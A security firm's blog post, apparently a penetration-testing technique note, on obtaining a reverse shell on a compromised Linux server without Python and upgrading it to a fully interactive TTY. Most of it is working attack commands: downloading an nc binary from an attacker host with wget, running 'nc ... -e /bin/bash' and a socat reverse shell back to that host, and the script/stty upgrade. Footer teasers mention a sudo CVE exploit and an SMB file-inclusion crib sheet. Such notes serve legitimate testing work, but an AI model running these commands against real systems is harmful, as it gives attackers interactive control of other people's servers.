Innogen security

RECENT BLOG

Posted in Uncategorized

Linux reverse shell without python.

During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought.

It was found that the go to technologies such as python, php, socat, ruby were unavailable so the following steps were taken in order to spawn the reverse shell and upgrade to tty:

web shell

First of all if you do not wish to go through the hassle of having tty with bash completion etc then merely fire the following command into the pseudo terminal:

/usr/bin/script -qc /bin/bash /dev/null

Then merely Ctrl+z and execute:

stty raw -echo; fg; reset

This will break you out of the pseudo terminal into a tty shell and you can su and carry out all other terminal based commands; for those wanting to jump through a couple of hoops and obtain a tty shell due to the above not working 100% then one of many ways to do this is below.

Copy over  NC and spawn a shell

Using wget and pythons SimpleHttpServer NC was easily moved over to the target:

Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
Server: ./nc 10.x.x.x 9998 -e /bin/bash
Attacking Machine: cp /usr/bin/nc .; python -m SimpleHttpServer 9998
Attacking Machine: nc -nlvp 9998

 

Break out of pseudo shell and upgrade to a tty shell

In order to upgrade our shell we first need to break out of the pseudo shell we are in.
First we will need to upgrade to a pty shell, generally I would default to trusty python using the following:

python -c 'import pty; pty.spawn("/bin/bash")'

or socat

Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998
Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998 

As neither of our prefered technologies were available we can fall back onto a more simple but what seems to be a long forgotten way of upgrading, which is using script.

Our our attacking machine which has caught the reverse nc shell we can simply breakout of our pseudo shell using the following command:

Attacking Machine: /usr/bin/script -qc /bin/bash /dev/null

ptyshell

All that is left is to do the following:

A: CTRL + Z to background the shell

B: paste or type the following into the terminal on the attacking machine

stty raw -echo; fg; reset

tty shell

Now you have a fully interactive shell with autocomplete and can continue to exploit the server and potentially execute su or local ssh commands on the server.

Granted there are many many more ways to achieve a the same shell, but using script seems to be overlooked quite often hence the post.

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019